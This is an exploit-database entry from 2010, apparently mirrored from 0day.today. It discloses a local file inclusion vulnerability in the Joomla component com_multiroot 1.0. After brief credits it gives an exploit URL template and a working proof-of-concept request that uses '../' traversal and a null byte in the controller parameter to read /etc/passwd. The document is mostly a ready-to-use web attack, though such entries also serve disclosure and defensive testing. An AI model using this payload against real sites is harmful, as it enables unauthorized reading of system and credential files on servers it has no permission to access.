id: 11873
date: 04/18/2010
title: Joomla Component com_multiroot Local File Inclusion Vulnerability
author: LionTurk
cves: 

=================================================================
Joomla Component com_multiroot Local File Inclusion Vulnerability
=================================================================

===============================================================================================================
 
 
  [o] Joomla Component Multiple Root Local File Inclusion Vulnerability
  
       Software : com_multiroot version 1.0
       Vendor   : http://joomlacomponent.inetlanka.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_multiroot&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
 
 
===============================================================================================================
 


#  0day.today [2023-03-22]  #